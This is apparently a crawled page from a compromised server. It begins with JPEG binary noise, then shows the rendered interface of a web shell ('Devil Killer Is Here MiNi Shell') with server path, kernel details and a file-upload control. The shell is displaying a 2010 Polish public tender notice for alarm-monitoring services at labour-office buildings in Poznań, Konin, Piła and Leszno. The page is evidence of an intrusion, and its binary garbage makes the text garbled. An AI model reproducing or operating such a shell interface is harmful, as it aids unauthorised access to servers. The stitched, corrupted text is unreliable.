JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101203/347717-N-2010.html

<p class="kh_header"><b>Poznań: Świadczenie usługi monitorowania sygnałów systemu alarmowego zainstalowanego w budynkach - Wojewódzkiego Urzędu Pracy w Poznaniu przy ul. Wawrzyńca 11 w Poznaniu i w Oddziale Zamiejscowym w Lesznie przy ul. Śniadeckich 5 oraz na usługę monitorowania sygnałów systemu alarmowego i ppoż zainstalowanego w budynkach - Wojewódzkiego Urzędu Pracy w Poznaniu Oddział Zamiejscowy w Koninie przy ul. Zakładowej 4 i w Pile przy al. Niepodległości 24, w terminie 01.01.2011 r. - 31.12.2011 r.</b><br>
<b>Numer ogłoszenia: 347717 - 2010; data zamieszczenia: 03.12.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Poznaniu , ul. Kościelna 37, 60-537 Poznań, woj. wielkopolskie, tel. 061 8463819, faks 061 8463820.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi monitorowania sygnałów systemu alarmowego zainstalowanego w budynkach - Wojewódzkiego Urzędu Pracy w Poznaniu przy ul. Wawrzyńca 11 w Poznaniu i w Oddziale Zamiejscowym w Lesznie przy ul. Śniadeckich 5 oraz na usługę monitorowania sygnałów systemu alarmowego i ppoż zainstalowanego w budynkach - Wojewódzkiego Urzędu Pracy w Poznaniu Oddział Zamiejscowy w Koninie przy ul. Zakładowej 4 i w Pile przy al. Niepodległości 24, w terminie 01.01.2011 r. - 31.12.2011 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia:
3.1 Część I 
Całodobowa ochrona przez dozorowanie (monitoring) budynku biurowego Wojewódzkiego Urzędu Pracy w Poznaniu Oddział Zamiejscowy w Koninie przy ul.  
Zakładowej 4. 
3.1.1 Opis stanu istniejącego.
W budynku biurowym jest zainstalowana instalacja przewodowa systemu włamania, ppoż. i zalania. Zamówienie usługi monitorowania systemu alarmowego włamania dotyczy obszaru chronionego dla Wojewódzkiego Urzędu Pracy i Agencji Rozwoju Regionalnego, klatek schodowych poszczególnych kondygnacji, piwnicy, wiatrołapu. 
Instalacja systemu włamania podzielona jest na dwa podsystemy:
- podsystem nr 1 - obszar chroniony dla Powiatowego Urzędu Pracy w Koninie - monitorowanie tego podsystemu nie jest przedmiotem zamówienia.
- podsystem nr 2 - obszar chroniony dla Wojewódzkiego Urzędu Pracy i Agencji Rozwoju Regionalnego, obejmujący pomieszczenia biurowe na II i III piętrze, klatki schodowe poszczególnych kondygnacji, piwnice, wiatrołap, oraz system alarmu ppoż i zalania obejmujący pomieszczenia piwnicy. Monitorowanie tego podsystemu jest przedmiotem zamówienia.
Osobą do kontaktu jest Pan Józef Augustiański, nr telefonu - 63/249-71-00.
3.1.2 Zobowiązania Wykonawcy.
a) całodobowy nadzór i utrzymanie w stałej sprawności technicznej stacji bazowej, której zadaniem jest odbiór sygnałów alarmowych z systemu lokalnego Zamawiającego do stacji monitorującej zainstalowanej w siedzibie Wykonawcy i będącej w dyspozycji Wykonawcy. Transmisja realizowana będzie za pośrednictwem łącza telefonicznego,
b) całodobowe monitorowanie i przyjmowanie sygnałów alarmowych z obiektu Zamawiającego,
c) wyposażenie pracowników w sprzęt niezbędny do wykonywania powierzonych im zadań oraz zabezpieczenie im transportu,
d) spowodowanie niezwłocznej interwencji i przyjazdu grupy interwencyjnej w czasie nieprzekraczającym 10 minut od odebrania sygnału o alarmie (napad, włamanie, pożar) i podjęcia czynności ochronnych. Po dokonaniu stosownych sprawdzeń, podjęcie działań, takich jak: powiadomienie Policji, Straży Pożarnej, Pogotowia Ratunkowego, osób wskazanych przez Zamawiającego oraz zabezpieczenia chronionego obiektu do czasu przybycia osób wskazanych przez Zamawiającego, Policji, Straży Pożarnej, Pogotowia Ratunkowego,
e) wezwanie osób wskazanych przez Zamawiającego w okolicznościach wskazujących na zaistnienie przestępstwa, bądź w sytuacji uzasadniającej podejrzenie jego popełnienia, takiej jak brak uszkodzeń, lecz: otwarte drzwi czy okna, zauważone przez grupę ruchy wewnątrz zamkniętego obiektu, dochodzące stamtąd odgłosy, światło mogące oznaczać pożar itp., 
f) powiadamianie o zdarzeniach osób wskazanych przez Zamawiającego.
3.1.3 Koszty dojazdu grupy interwencyjnej zostaną uwzględnione przez Wykonawcę w cenie oferty, za wyjątkiem zaistnienia tzw. fałszywego alarmu, zawinionego przez Zamawiającego. 
Jeżeli po stronie użytkownika nie stwierdzi się żadnych uchybień w zakresie eksploatacji systemu alarmowego, wywołany alarm traktowany jest jako uzasadniony i nie rodzi obowiązku uiszczenia opłaty.
Za alarmy nieuzasadnione uznaje się sygnały wysłane z chronionego obiektu, w którym grupa interwencyjna nie stwierdziła żadnych widocznych oznak włamania, napadu bądź usiłowania włamania lub napadu, w szczególności alarmy spowodowane przez użytkownika przy rozbrajaniu lub uzbrajaniu systemu, przez pozostawienie w obiekcie otwartych okien, zwierząt, pracujących urządzeń technicznych. Odwołanie alarmu w komunikacie telefonicznym zawierającym hasło, powinno nastąpić nie później niż 2 minuty po zajściu zdarzenia.
3.1.4 Wykonawca, który wygra postępowanie zobowiązany będzie do:
a) utrzymania już istniejącego będącego własnością Wojewódzkiego Urzędu Pracy w Poznaniu systemu alarmowego (włamania, ppoż, zalania) w chronionym obiekcie przez czas trwania umowy w stanie sprawnym technicznie, w tym dokonywania odpowiednich czynności konserwacyjnych i okresowych przeglądów. Ewentualna wymiana zużytych elementów może zostać zlecona na podstawie przedstawionego kosztorysu naprawy. Zapłata za wykonaną usługę nastąpi po sporządzeniu protokołu odbioru robót,
b) rejestrowania określonych sygnałów z lokalnego systemu alarmowego.
3.1.5 Zamawiający zaleca przeprowadzenie wizji lokalnej obiektów opisanych w przedmiocie zamówienia. Termin wizji i szczegóły techniczne jej przeprowadzenia wymagają uzgodnień z Zamawiającym. W celu ustalenia daty i godziny wizji lokalnej prosimy o kontakt z osobami do kontaktu, (wymienionymi w opisie przedmiotu zamówienia) na numery telefonów podanych w danych adresowych obiektu.
3.2 Część II
Całodobowa ochrona przez dozorowanie (monitoring) budynku biurowego Wojewódzkiego Urzędu Pracy w Poznaniu Oddział Zamiejscowy w Pile przy al. Niepodległości 24. 
3.2.1 Opis stanu istniejącego.
W budynku biurowym jest zainstalowana instalacja przewodowa systemu włamania, ppoż. 
Monitoring systemu alarmu włamania obejmuje trzy kondygnacje tj. parter, I piętro, II piętro budynku, natomiast monitoring systemu alarmu ppoż obejmuje piwnicę.
Osobą do kontaktu jest Pani Urszula Hoppe nr telefonu - 67/212-30-84.
3.2.2 Zobowiązania Wykonawcy.
a) całodobowy nadzór i utrzymanie w stałej sprawności technicznej stacji bazowej, której zadaniem jest odbiór sygnałów alarmowych z systemu lokalnego Zamawiającego do stacji monitorującej zainstalowanej w siedzibie Wykonawcy i będącej w dyspozycji Wykonawcy. Transmisja realizowana będzie za pośrednictwem łącza telefonicznego,
b) całodobowe monitorowanie i przyjmowanie sygnałów alarmowych z obiektu Zamawiającego,
c) wyposażenie pracowników w sprzęt niezbędny do wykonywania powierzonych im zadań oraz zabezpieczenie im transportu,
d) spowodowanie niezwłocznej interwencji i przyjazdu grupy interwencyjnej w czasie nieprzekraczającym 10 minut od odebrania sygnału o alarmie (napad, włamanie, pożar) i podjęcia czynności ochronnych. Po dokonaniu stosownych sprawdzeń, podjęcie działań, takich jak: powiadomienie Policji, Straży Pożarnej, Pogotowia Ratunkowego, osób wskazanych przez Zamawiającego oraz zabezpieczenia chronionego obiektu do czasu przybycia osób wskazanych przez Zamawiającego, Policji, Straży Pożarnej, Pogotowia Ratunkowego,
e) wezwanie osób wskazanych przez Zamawiającego w okolicznościach wskazujących na zaistnienie przestępstwa, bądź w sytuacji uzasadniającej podejrzenie jego popełnienia, takiej jak brak uszkodzeń, lecz: otwarte drzwi czy okna, zauważone przez grupę ruchy wewnątrz zamkniętego obiektu, dochodzące stamtąd odgłosy, światło mogące oznaczać pożar itp., 
f) powiadamianie o zdarzeniach osoby wskazane przez Zamawiającego.
3.2.3 Koszty dojazdu grupy interwencyjnej zostaną uwzględnione przez Wykonawcę w cenie oferty, za wyjątkiem zaistnienia tzw. fałszywego alarmu, zawinionego przez Zamawiającego. 
Jeżeli po stronie użytkownika nie stwierdzi się żadnych uchybień w zakresie eksploatacji systemu alarmowego, wywołany alarm traktowany jest jako uzasadniony i nie rodzi obowiązku uiszczenia opłaty.
Za alarmy nieuzasadnione uznaje się sygnały wysłane z chronionego obiektu, w którym grupa interwencyjna nie stwierdziła żadnych widocznych oznak włamania, napadu bądź usiłowania włamania lub napadu, w szczególności alarmy spowodowane przez użytkownika przy rozbrajaniu lub uzbrajaniu systemu, przez pozostawienie w obiekcie otwartych okien, zwierząt, pracujących urządzeń technicznych. Odwołanie alarmu w komunikacie telefonicznym zawierającym hasło, powinno nastąpić nie później niż 2 minuty po zajściu zdarzenia.
3.2.4 Wykonawca, który wygra postępowanie zobowiązany będzie do:
a) utrzymania już istniejącego będącego własnością Wojewódzkiego Urzędu Pracy w Poznaniu systemu alarmowego (włamania, ppoż) w chronionym obiekcie przez czas trwania umowy w stanie sprawnym technicznie, w tym dokonywania odpowiednich czynności konserwacyjnych i okresowych przeglądów. Ewentualna wymiana zużytych elementów może zostać zlecona na podstawie przedstawionego kosztorysu naprawy. Zapłata za wykonaną usługę nastąpi po sporządzeniu protokołu odbioru robót,
b) rejestrowania określonych sygnałów z lokalnego systemu alarmowego.
3.2.5 Zamawiający zaleca przeprowadzenie wizji lokalnej obiektów opisanych w przedmiocie zamówienia. Termin wizji i szczegóły techniczne jej przeprowadzenia wymagają uzgodnień z Zamawiającym. W celu ustalenia daty i godziny wizji lokalnej prosimy o kontakt z osobami do kontaktu, (wymienionymi w opisie przedmiotu zamówienia) na numery telefonów podanych w danych adresowych obiektu.
3.3 Część III
Całodobowa ochrona przez dozorowanie (monitoring) budynku biurowego Wojewódzkiego Urzędu Pracy Poznaniu przy ul. Wawrzyńca 11. 
3.3.1 Opis stanu istniejącego.
W budynku biurowym jest zainstalowana instalacja przewodowa systemu antywłamaniowego. Monitoring systemu alarmu włamania obejmuje pomieszczenia biurowe na dwóch kondygnacjach tj. I piętro, II piętro budynku oraz hol na parterze i klatki schodowe poszczególnych kondygnacji.
Osobą do kontaktu jest Pan Przemysław Laudański nr telefonu - 61/846-38-13.
3.3.2 Zobowiązania Wykonawcy.
a) całodobowy nadzór i utrzymanie w stałej sprawności technicznej stacji bazowej, której zadaniem jest odbiór sygnałów alarmowych z systemu lokalnego Zamawiającego do stacji monitorującej zainstalowanej w siedzibie Wykonawcy i będącej w dyspozycji Wykonawcy. Transmisja realizowana będzie za pośrednictwem modułu i sygnału GSM,
b) całodobowe monitorowanie i przyjmowanie sygnałów alarmowych z obiektu Zamawiającego,
c) wyposażenie pracowników w sprzęt niezbędny do wykonywania powierzonych im zadań oraz zabezpieczenie im transportu,
d) spowodowanie niezwłocznej interwencji i przyjazdu grupy interwencyjnej w czasie nieprzekraczającym 10 minut od odebrania sygnału o alarmie (napad, włamanie) i podjęcia czynności ochronnych. Po dokonaniu stosownych sprawdzeń, podjęcie działań, takich jak: powiadomienie Policji, Straży Pożarnej, Pogotowia Ratunkowego, osób wskazanych przez Zamawiającego oraz zabezpieczenia chronionego obiektu do czasu przybycia osób wskazanych przez Zamawiającego, Policji, Straży Pożarnej, Pogotowia Ratunkowego,
e) wezwanie osób wskazanych przez Zamawiającego w okolicznościach wskazujących na zaistnienie przestępstwa, bądź w sytuacji uzasadniającej podejrzenie jego popełnienia, takiej jak brak uszkodzeń, lecz: otwarte drzwi czy okna, zauważone przez grupę ruchy wewnątrz zamkniętego obiektu, dochodzące stamtąd odgłosy, światło mogące oznaczać pożar itp., 
f) powiadamianie o zdarzeniach osoby wskazane przez Zamawiającego.
3.3.3 Koszty dojazdu grupy interwencyjnej zostaną uwzględnione przez Wykonawcę w cenie oferty, za wyjątkiem zaistnienia tzw. fałszywego alarmu, zawinionego przez Zamawiającego. 
Jeżeli po stronie użytkownika nie stwierdzi się żadnych uchybień w zakresie eksploatacji systemu alarmowego, wywołany alarm traktowany jest jako uzasadniony i nie rodzi obowiązku uiszczenia opłaty.
Za alarmy nieuzasadnione uznaje się sygnały z chronionego obiektu, w którym grupa interwencyjna nie stwierdziła żadnych widocznych oznak włamania, napadu bądź usiłowania włamania lub napadu, w szczególności alarmy spowodowane przez użytkownika przy rozbrajaniu lub uzbrajaniu systemu, przez pozostawienie w obiekcie otwartych okien, zwierząt, pracujących urządzeń technicznych. Odwołanie alarmu w komunikacie telefonicznym zawierającym hasło, powinno nastąpić nie później niż 2 minuty po zajściu zdarzenia.
3.3.4 Wykonawca, który wygra postępowanie zobowiązany będzie do:
a) utrzymania już istniejącego będącego własnością Wojewódzkiego Urzędu Pracy w Poznaniu systemu alarmowego (włamania) w chronionym obiekcie przez czas trwania umowy w stanie sprawnym technicznie, w tym dokonywania odpowiednich czynności konserwacyjnych i okresowych przeglądów. Ewentualna wymiana zużytych elementów może zostać zlecona na podstawie przedstawionego kosztorysu naprawy. Zapłata za wykonaną usługę nastąpi po sporządzeniu protokołu odbioru robót,
b) rejestrowania określonych sygnałów z lokalnego systemu alarmowego.
3.3.5 Zamawiający zaleca przeprowadzenie wizji lokalnej obiektów opisanych w przedmiocie zamówienia. Termin wizji i szczegóły techniczne jej przeprowadzenia wymagają uzgodnień z Zamawiającym. W celu ustalenia daty i godziny wizji lokalnej prosimy o kontakt z osobami do kontaktu, (wymienionymi w opisie przedmiotu zamówienia) na numery telefonów podanych w danych adresowych obiektu.
3.4 Część IV 
Całodobowa ochrona przez dozorowanie (monitoring) budynku biurowego Wojewódzkiego Urzędu Pracy w Poznaniu Oddział Zamiejscowy w Lesznie przy ul. Śniadeckich 5. 
3.4.1 Opis stanu istniejącego.
W budynku  biurowym jest zainstalowana instalacja przewodowa systemu włamania. Monitoring systemu alarmu włamania obejmuje jedną kondygnację tj. I piętro, budynku - pomieszczenia biurowe i korytarz.
Osobą do kontaktu jest Pan Zdzisław Giera nr telefonu - 65/529-57-66.
3.4.2 Zobowiązania Wykonawcy.
a) całodobowy nadzór i utrzymanie w stałej sprawności technicznej stacji bazowej, której zadaniem jest odbiór sygnałów alarmowych z systemu lokalnego Zamawiającego do stacji monitorującej zainstalowanej w siedzibie Wykonawcy i będącej w dyspozycji Wykonawcy. Transmisja realizowana będzie za pośrednictwem łącza telefonicznego,
b) całodobowe monitorowanie i przyjmowanie sygnałów alarmowych z obiektu Zamawiającego,
c) wyposażenie pracowników w sprzęt niezbędny do wykonywania powierzonych im zadań oraz zabezpieczenie im transportu,
d) spowodowanie niezwłocznej interwencji i przyjazdu grupy interwencyjnej w czasie nieprzekraczającym 10 minut od odebrania sygnału o alarmie (napad, włamanie) i podjęcia czynności ochronnych. Po dokonaniu stosownych sprawdzeń, podjęcie działań, takich jak: powiadomienie Policji, Straży Pożarnej, Pogotowia Ratunkowego, osób wskazanych przez Zamawiającego oraz zabezpieczenia chronionego obiektu do czasu przybycia osób wskazanych przez Zamawiającego, Policji, Straży Pożarnej, Pogotowia Ratunkowego,
e) wezwanie osób wskazanych przez Zamawiającego w okolicznościach wskazujących na zaistnienie przestępstwa, bądź w sytuacji uzasadniającej podejrzenie jego popełnienia, takiej jak brak uszkodzeń, lecz: otwarte drzwi czy okna, zauważone przez grupę ruchy wewnątrz zamkniętego obiektu, dochodzące stamtąd odgłosy, światło mogące oznaczać pożar itp., 
f) powiadamianie o zdarzeniach osoby wskazane przez Zamawiającego.
3.4.3 Koszty dojazdu grupy interwencyjnej zostaną uwzględnione przez Wykonawcę w cenie oferty, za wyjątkiem zaistnienia tzw. fałszywego alarmu, zawinionego przez Zamawiającego. 
Jeżeli po stronie użytkownika nie stwierdzi się żadnych uchybień w zakresie eksploatacji systemu alarmowego, wywołany alarm traktowany jest jako uzasadniony i nie rodzi obowiązku uiszczenia opłaty.
Za alarmy nieuzasadnione uznaje się sygnały z chronionego obiektu, w którym grupa interwencyjna nie stwierdziła żadnych widocznych oznak włamania, napadu bądź usiłowania włamania lub napadu, w szczególności alarmy spowodowane przez użytkownika przy rozbrajaniu lub uzbrajaniu systemu, przez pozostawienie w obiekcie otwartych okien, zwierząt, pracujących urządzeń technicznych. Odwołanie alarmu w komunikacie telefonicznym zawierającym hasło, powinno nastąpić nie później niż 2 minuty po zajściu zdarzenia.
3.4.4 Wykonawca, który wygra postępowanie zobowiązany będzie do:
a) utrzymania już istniejącego będącego własnością Wojewódzkiego Urzędu Pracy w Poznaniu systemu alarmowego (włamania) w chronionym obiekcie przez czas trwania umowy w stanie sprawnym technicznie, w tym dokonywania odpowiednich czynności konserwacyjnych i okresowych przeglądów. Ewentualna wymiana zużytych elementów może zostać zlecona na podstawie przedstawionego kosztorysu naprawy. Zapłata za wykonaną usługę nastąpi po sporządzeniu protokołu odbioru robót,
b) rejestrowania określonych sygnałów z lokalnego systemu alarmowego.
3.4.5 Zamawiający zaleca przeprowadzenie wizji lokalnej obiektów opisanych w przedmiocie zamówienia. Termin wizji i szczegóły techniczne jej przeprowadzenia wymagają uzgodnień z Zamawiającym. W celu ustalenia daty i godziny wizji lokalnej prosimy o kontakt z osobami do kontaktu, (wymienionymi w opisie przedmiotu zamówienia) na numery telefonów podanych w danych adresowych obiektu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia, nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia, nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia, nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia, nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia, nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

